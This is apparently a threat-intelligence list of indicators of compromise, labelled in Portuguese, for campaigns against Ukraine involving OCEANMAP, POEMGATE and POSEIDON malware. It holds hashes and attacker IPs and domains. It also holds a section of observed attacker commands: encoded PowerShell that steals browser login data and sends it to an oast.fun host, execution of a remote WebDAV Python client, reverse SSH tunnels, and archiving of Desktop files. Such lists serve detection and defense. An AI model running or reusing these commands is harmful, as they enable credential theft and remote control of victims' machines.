KFP.311.152.2023.pdf.lnk: 825a12e2377dd694bbb667f862d60c43 593583b312bf48b7748f4372e6f4a560fd38e969399cf2a96798e2594a517bf4
Стратегії України.pdf .lnk: acd9fc44001da67f1a3592850ec09cb7 c22868930c02f2d6962167198fde0d3cda78ac18af506b57f1ca25ca5c39c50d

Redes:

\\194[.]126.178.8@80\webdav\Docs\231130 № 581.pdf .lnk
\\194[.]126.178.8@80\webdav\Docs\231130 № 581.pdf
\\194[.]126.178.8@80\webdav\Python39\Client[.]py
\\\194[.]126.178.8@80\webdav\Python39\python[.]exe
173[.]239.196.66 (X-Originating-IP)
(tcp)://88[.]209.251.6:80
194[.]126.178.8
88[.]209.251.6
74[.]124.219.71 (OCEANMAP C2)
czyrqdnvpujmmjkfhhvs4knf1av02demj.oast[.]fun
czyrqdnvpujmmjkfhhvsclx05sfi23bfr.oast[.]fun
czyrqdnvpujmmjkfhhvsgapqr3hclnhhj.oast[.]fun
czyrqdnvpujmmjkfhhvsvlaax17vd5r6v.oast[.]fun
hXXp://194[.]126.178.8/webdav/wody[.]pdf
hXXp://194[.]126.178.8/webdav/wody[.]zip
hXXp://194.126.178.8/webdav/StrategyUa.pdf
hXXp://194[.]126.178.8/webdav/231130N581[.]pdf
hXXp://czyrqdnvpujmmjkfhhvsclx05sfi23bfr.oast[.]fun
hXXp://czyrqdnvpujmmjkfhhvsgapqr3hclnhhj.oast[.]fun
hXXp://czyrqdnvpujmmjkfhhvsvlaax17vd5r6v.oast[.]fun
hXXp://czyrqdnvpujmmjkfhhvs4knf1av02demj.oast[.]fun
hXXps://nas-files.firstcloudit[.]com/
hXXps://ua-calendar.firstcloudit[.]com/
hXXps://e-nas.firstcloudit[.]com/
jrb@bahouholdings.com (OCEANMAP C2)
nas-files.firstcloudit[.]com
e-nas.firstcloudit[.]com
ua-calendar.firstcloudit[.]com
qasim.m@facadesolutionsuae.com (OCEANMAP C2)
webmail.facadesolutionsuae[.]com (OCEANMAP C2)

Comandos e arquivos locais:

%PROGRAMDATA%\2.txt
%PROGRAMDATA%\python.zip
%PROGRAMDATA%\python\python-3.10.0-embed-amd64\Client.py
%USERPROFILE%\.ssh\known_hosts %LOCALAPPDATA%\11.zip
%LOCALAPPDATA%\Temp\RarSFX0\VMSearch.exe
%LOCALAPPDATA%\Temp\RarSFX1\VMSearch.exe
%LOCALAPPDATA%\Temp\VMSearch.sfx.exe
%LOCALAPPDATA%\i.lnk
%LOCALAPPDATA%\key
%LOCALAPPDATA%\python.zip
%LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py
%LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe
%LOCALAPPDATA%\qz.zip
%LOCALAPPDATA%\s.lnk
%LOCALAPPDATA%\s.zip
%LOCALAPPDATA%\s2.zip
%LOCALAPPDATA%\s3.zip
%LOCALAPPDATA%\sys.zip
%LOCALAPPDATA%\t.lnk
%LOCALAPPDATA%\temp1.txt
%LOCALAPPDATA%\temp2.txt
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.lnk
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\VMSearch.url
C:\WINDOWS\system32\cmd.exe /c "powershell.exe -c "$a=Get-Content "%LOCALAPPDATA%\2.txt";powershell.exe -windowstyle hidden -encodedCommand $a""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "%PROGRAMDATA%\python\python-3.10.0-embed-amd64\python.exe %PROGRAMDATA%\python\python-3.10.0-embed-amd64\Client.py"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/231130N581.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/StrategyUa.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwA7ACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ADsAIAAkAGgAbwBvAGsAPQAiAGgAdAB0AHAAOgAvAC8AYwB6AHkAcgBxAGQAbgB2AHAAdQBqAG0AbQBqAGsAZgBoAGgAdgBzAGMAbAB4ADAANQBzAGYAaQAyADMAYgBmAHIALgBvAGEAcwB0AC4AZgB1AG4AIgA7ACAAJABkAGEAdABhAFAAYQB0AGgAPQAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwATABvAGMAYQBsACAAUwB0AGEAdABlACIAOwAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAC0AUgBhAHcAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7ACQAZQBuAGMAXwBrAGUAeQAgAD0AIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUASgBzAG8AbgAuAG8AcwBfAGMAcgB5AHAAdAAuAGUAbgBjAHIAeQBwAHQAZQBkAF8AawBlAHkAOwAgACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAIAA9ACAAWwBiAHkAdABlAFsAXQBdAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBfAGsAZQB5ACkAOwAgACQAawBlAHkAIAA9ACAAWwBzAHkAcwB0AGUAbQAuAHMAZQBjAHUAcgBpAHQAeQAuAGMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AcAByAG8AdABlAGMAdABlAGQAZABhAHQAYQBdADoAOgBVAG4AcAByAG8AdABlAGMAdAAoACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAWwA1AC4ALgAkAG0AYQBzAHQAZQByAF8AawBlAHkAXwBlAG4AYwBvAGQAZQBkAC4AbABlAG4AZwB0AGgAXQAsACAAJABuAHUAbABsACwAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBEAGEAdABhAFAAcgBvAHQAZQBjAHQAaQBvAG4AUwBjAG8AcABlAF0AOgA6AEMAdQByAHIAZQBuAHQAVQBzAGUAcgApADsAIAAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBwAGEAdABoACAAJABkAGEAdABhAFAAYQB0AGgAIAAtAEUAbgBjAG8AZABpAG4AZwAgAGIAeQB0AGUAKQApADsAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAA9ACAAQAB7AGsAZQB5AD0AKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGsAZQB5ACkAKQA7AGQAYQB0AGEAPQAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAB9ADsAIABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABoAG8AbwBrACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAAtAHUAcwBlAGIAOwAgACQAZABhAHQAYQBQAGEAdABoAD0AIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABcAE0AaQBjAHIAbwBzAG8AZgB0AFwAXABFAGQAZwBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwATQBpAGMAcgBvAHMAbwBmAHQAXABcAEUAZABnAGUAXABcAFUAcwBlAHIAIABEAGEAdABhAFwAXABMAG8AYwBhAGwAIABTAHQAYQB0AGUAIgA7ACAAJABsAG8AYwBhAGwAUwB0AGEAdABlAEoAcwBvAG4APQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBQAGEAdABoACAALQBSAGEAdwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJABlAG4AYwBfAGsAZQB5ACAAPQAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAC4AbwBzAF8AYwByAHkAcAB0AC4AZQBuAGMAcgB5AHAAdABlAGQAXwBrAGUAeQA7ACAAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZAAgAD0AIABbAGIAeQB0AGUAWwBdAF0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgBjAF8AawBlAHkAKQA7ACAAJABrAGUAeQAgAD0AIABbAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBwAHIAbwB0AGUAYwB0AGUAZABkAGEAdABhAF0AOgA6AFUAbgBwAHIAbwB0AGUAYwB0ACgAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZABbADUALgAuACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQALgBsAGUAbgBnAHQAaABdACwAIAAkAG4AdQBsAGwALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEQAYQB0AGEAUAByAG8AdABlAGMAdABpAG8AbgBTAGMAbwBwAGUAXQA6ADoAQwB1AHIAcgBlAG4AdABVAHMAZQByACkAOwAgACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAHAAYQB0AGgAIAAkAGQAYQB0AGEAUABhAHQAaAAgAC0ARQBuAGMAbwBkAGkAbgBnACAAYgB5AHQAZQApACkAOwAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAD0AIABAAHsAawBlAHkAPQAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBlAHkAKQApADsAZABhAHQAYQA9ACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAH0AOwAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAGgAbwBvAGsAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0AQgBvAGQAeQAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAC0AdQBzAGUAYgA7AA=="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwA7ACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5ADsAIAAkAGgAbwBvAGsAPQAiAGgAdAB0AHAAOgAvAC8AYwB6AHkAcgBxAGQAbgB2AHAAdQBqAG0AbQBqAGsAZgBoAGgAdgBzAGMAbAB4ADAANQBzAGYAaQAyADMAYgBmAHIALgBvAGEAcwB0AC4AZgB1AG4AIgA7ACAAJABkAGEAdABhAFAAYQB0AGgAPQAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwARwBvAG8AZwBsAGUAXABcAEMAaAByAG8AbQBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwATABvAGMAYQBsACAAUwB0AGEAdABlACIAOwAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAC0AUgBhAHcAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0ASgBzAG8AbgA7ACQAZQBuAGMAXwBrAGUAeQAgAD0AIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUASgBzAG8AbgAuAG8AcwBfAGMAcgB5AHAAdAAuAGUAbgBjAHIAeQBwAHQAZQBkAF8AawBlAHkAOwAgACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAIAA9ACAAWwBiAHkAdABlAFsAXQBdAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBfAGsAZQB5ACkAOwAgACQAawBlAHkAIAA9ACAAWwBzAHkAcwB0AGUAbQAuAHMAZQBjAHUAcgBpAHQAeQAuAGMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AcAByAG8AdABlAGMAdABlAGQAZABhAHQAYQBdADoAOgBVAG4AcAByAG8AdABlAGMAdAAoACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQAWwA1AC4ALgAkAG0AYQBzAHQAZQByAF8AawBlAHkAXwBlAG4AYwBvAGQAZQBkAC4AbABlAG4AZwB0AGgAXQAsACAAJABuAHUAbABsACwAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBEAGEAdABhAFAAcgBvAHQAZQBjAHQAaQBvAG4AUwBjAG8AcABlAF0AOgA6AEMAdQByAHIAZQBuAHQAVQBzAGUAcgApADsAIAAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBwAGEAdABoACAAJABkAGEAdABhAFAAYQB0AGgAIAAtAEUAbgBjAG8AZABpAG4AZwAgAGIAeQB0AGUAKQApADsAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAA9ACAAQAB7AGsAZQB5AD0AKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGsAZQB5ACkAKQA7AGQAYQB0AGEAPQAkAGwAbwBnAGkAbgBEAGEAdABhAEMAbwBuAHQAZQBuAHQAIAB9ADsAIABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABoAG8AbwBrACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAkAHAAbwBzAHQAUABhAHIAYQBtAHMAIAAtAHUAcwBlAGIAOwAgACQAZABhAHQAYQBQAGEAdABoAD0AIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABcAE0AaQBjAHIAbwBzAG8AZgB0AFwAXABFAGQAZwBlAFwAXABVAHMAZQByACAARABhAHQAYQBcAFwARABlAGYAYQB1AGwAdABcAFwATABvAGcAaQBuACAARABhAHQAYQAiADsAIAAkAGwAbwBjAGEAbABTAHQAYQB0AGUAUABhAHQAaAAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAFwATQBpAGMAcgBvAHMAbwBmAHQAXABcAEUAZABnAGUAXABcAFUAcwBlAHIAIABEAGEAdABhAFwAXABMAG8AYwBhAGwAIABTAHQAYQB0AGUAIgA7ACAAJABsAG8AYwBhAGwAUwB0AGEAdABlAEoAcwBvAG4APQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBQAGEAdABoACAALQBSAGEAdwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJABlAG4AYwBfAGsAZQB5ACAAPQAgACQAbABvAGMAYQBsAFMAdABhAHQAZQBKAHMAbwBuAC4AbwBzAF8AYwByAHkAcAB0AC4AZQBuAGMAcgB5AHAAdABlAGQAXwBrAGUAeQA7ACAAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZAAgAD0AIABbAGIAeQB0AGUAWwBdAF0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgBjAF8AawBlAHkAKQA7ACAAJABrAGUAeQAgAD0AIABbAHMAeQBzAHQAZQBtAC4AcwBlAGMAdQByAGkAdAB5AC4AYwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBwAHIAbwB0AGUAYwB0AGUAZABkAGEAdABhAF0AOgA6AFUAbgBwAHIAbwB0AGUAYwB0ACgAJABtAGEAcwB0AGUAcgBfAGsAZQB5AF8AZQBuAGMAbwBkAGUAZABbADUALgAuACQAbQBhAHMAdABlAHIAXwBrAGUAeQBfAGUAbgBjAG8AZABlAGQALgBsAGUAbgBnAHQAaABdACwAIAAkAG4AdQBsAGwALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEQAYQB0AGEAUAByAG8AdABlAGMAdABpAG8AbgBTAGMAbwBwAGUAXQA6ADoAQwB1AHIAcgBlAG4AdABVAHMAZQByACkAOwAgACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAHAAYQB0AGgAIAAkAGQAYQB0AGEAUABhAHQAaAAgAC0ARQBuAGMAbwBkAGkAbgBnACAAYgB5AHQAZQApACkAOwAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAD0AIABAAHsAawBlAHkAPQAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawBlAHkAKQApADsAZABhAHQAYQA9ACQAbABvAGcAaQBuAEQAYQB0AGEAQwBvAG4AdABlAG4AdAAgAH0AOwAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQByAGkAIAAkAGgAbwBvAGsAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0AQgBvAGQAeQAgACQAcABvAHMAdABQAGEAcgBhAG0AcwAgAC0AdQBzAGUAYgA7AA==
\\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py
cmd /C start powershell.exe -w hid -nop -c "%LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py"
powershell -c start-process ssh.exe -windowstyle Hidden -ArgumentList "-N -o ServerAliveInterval=30 -p80 root@88.209.251.6 -R 88.209.251.6:10858 -i %LOCALAPPDATA%\key -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no" -PassThru
powershell -c start-process ssh.exe -windowstyle Hidden -ArgumentList "-N -o ServerAliveInterval=30 -p80 root@88.209.251.6 -R 88.209.251.6:10859 -i %LOCALAPPDATA%\key -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no" -PassThru
powershell.exe -c "$a=Get-Content "%PROGRAMDATA%\2.txt";powershell.exe -windowstyle hidden -encodedCommand $a"powershell.exe -c $a=Get-Content "%PROGRAMDATA%\2.txt";powershell.exe -windowstyle hidden -encodedCommand $a
powershell.exe -c $a=Get-Content -Encoding 'Default' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Encoding 'String' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Encoding 'ascii' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s.zip
powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp.txt";dir "$a"
powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp1.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s2.zip
powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp2.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s3.zip
powershell.exe -c $a=Get-Content -Encoding 'oem' -Path "%LOCALAPPDATA%\temp2.txt";dir "$a"
powershell.exe -c $a=Get-Content -Encoding 'unicode' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Encoding 'utf32' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Encoding 'utf8' -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Path "%LOCALAPPDATA%\temp.txt";"$a"
powershell.exe -c $a=Get-Content -Path "%LOCALAPPDATA%\temp.txt";Compress-Archive -Force "$a" %LOCALAPPDATA%\s.zip
powershell.exe -c Compress-Archive -Force %USERPROFILE%\Desktop\ %LOCALAPPDATA%\qz.zip
powershell.exe -c Get-WinEvent -FilterHashtable @{logname="system"; id=1129}
powershell.exe -c Get-WinEvent -FilterHashtable @{logname="system"; id=1501}
powershell.exe -c dir /S %USERPROFILE% *.dat
powershell.exe -c import-module ActiveDirectory;Get-AdDomainController
powershell.exe -c net time /domain
powershell.exe -c net time /domain:%DOMAIN%.local
powershell.exe -w hid -nop -c %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py
powershell.exe -w hid -nop -c Expand-Archive -Force %PROGRAMDATA%\python.zip %PROGRAMDATA%\python
powershell.exe -w hid -nop -c start "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.lnk"
powershell.exe -w hid -nop gpresult /z
powershell.exe -w hid -nop gpupdate
powershell.exe Compress-Archive -Force %USERPROFILE%\Desktop\ %LOCALAPPDATA%\sys.zip
powershell.exe Compress-Archive -Force %USERPROFILE%\Desktop\*.lnk %LOCALAPPDATA%\11.zip
powershell.exe Compress-Archive %USERPROFILE%\Desktop %LOCALAPPDATA%\sys.zip
powershell.exe Expand-Archive -Force %LOCALAPPDATA%\python.zip %LOCALAPPDATA%\python
powershell.exe Get-ADDomainController
powershell.exe Get-Content %LOCALAPPDATA%\i.lnk
powershell.exe Get-DnsClientServerAddress powershell.exe Get-NetAdapter
powershell.exe Get-NetAdapterBinding | Where-Object ComponentID -EQ 'ms_tcpip6'
powershell.exe Get-NetIPConfiguration -All
powershell.exe Resolve-DNSName %DC%
powershell.exe Resolve-DNSName %DOMAIN%.local
powershell.exe Test-NetConnection %FS% -Port 445 -v
powershell.exe [System.Directoryservices.Activedirectory.Domain]::GetCurrentDomain() powershell.exe date
powershell.exe dir %USERPROFILE%\Desktop
powershell.exe ipconfig /flushdns
powershell.exe net start dnscache
powershell.exe net stop dnscache

Poemgate e Poseidon (CERT-UA) (NOVO)

Arquivos:

ps (SOCKS5): 2b88885fb57e28497522238bd8f8befc 8ddd681dd834ab66f6a1c00ba2830717bf845de5639708eb8e8ab795ffd1df5a
pam_unix.so (POEMGATE): 5d9a661f35d4e136d389bea878c4252f eb01925836eed1dbd85a8ab9aa05c5c45dc051abaae9e67db3a53489d776b6c2
pam_unix.so (POEMGATE): 20a07ba71cab0f92c566b31e96fdf0e8 9060ca8e829fc136d1ecd95a5204abb48f3ce5b7339619c5668c7e176dcbb235
pam_unix.so (POEMGATE): a74dbcae530f52f62cbdcef3dc18feee e9c5dc9cec95f31cea2eb88cc26a35d29c5f89f23bff6a7cfa1250dec6d5701a
wccrt (WHITECAT): 45fad72d370ff88c5b349cb741cc26ce 8fb3ed6261a2358e0890bfd544e515af232f87d3aef947e09f640da7cc1b89d9
libs.so (POSEIDON): 59f2c3f6e4baf721c02a66179147241a 0e24a1268212a790bc3993750f194ac1e0996a6770b32b498341f06abac45d81
75cde685cd3f00f354155e3c433698c7 e4cff7071e184e3f1bfedfe30afa52ddd2cac1a00983508d142e51ecebfcba14 .1
script.txt: 61b70767326387f141a18e2fbb250a68 b5ec1d43462a770d207eefb906516631e4d80eea55779509616b58b39a764455
scan.sh: 302f158ca6f6094e90bd43f7748dd65f 65c880f2a3833898c54d7f48ee0709a13887376b2ea5bc933b2e70f29614e728

Rede:

eurotelle[.]com
103[.]251.167.20
103[.]251.167.21
104[.]244.72.8
107[.]189.30.69
139[.]99.237.205
146[.]59.233.33
146[.]59.35.246
156[.]146.63.139
158[.]118.218.193
162[.]247.73.192
162[.]247.74.201
162[.]247.74.206
162[.]247.74.216
162[.]247.74.27
162[.]247.74.74
167[.]86.94.107
171[.]25.193.20
171[.]25.193.235
171[.]25.193.25
171[.]25.193.77
171[.]25.193.78
179[.]43.159.195
179[.]43.159.198
182[.]118.218.193
185[.]100.86.121
185[.]100.87.41
185[.]129.61.129
185[.]129.61.7
185[.]129.62.62
185[.]130.47.58
185[.]14.28.207
185[.]165.169.239
185[.]220.101.152
185[.]220.102.240
185[.]220.102.241
185[.]220.102.242
185[.]220.102.247
185[.]220.102.251
185[.]220.102.252
185[.]220.102.253
185[.]220.102.254
185[.]220.102.8
185[.]220.103.8
185[.]233.100.23
185[.]235.146.29
185[.]241.208.206
185[.]241.208.232
185[.]246.188.60
185[.]246.188.67
185[.]246.188.74
185[.]254.75.55
185[.]34.33.2
185[.]56.83.83
185[.]67.82.114
192[.]42.116.13
192[.]42.116.16
192[.]42.116.18
192[.]42.116.23
192[.]42.116.25
193[.]218.118.158
193[.]218.118.182
195[.]69.202.145
203[.]28.246.189
204[.]28.48.77
204[.]8.156.142
217[.]12.208.73
23[.]129.64.133
2[.]56.164.52
2[.]58.56.101
45[.]139.122.241
45[.]141.215.111
45[.]154.98.225
46[.]182.21.248
51[.]89.153.112
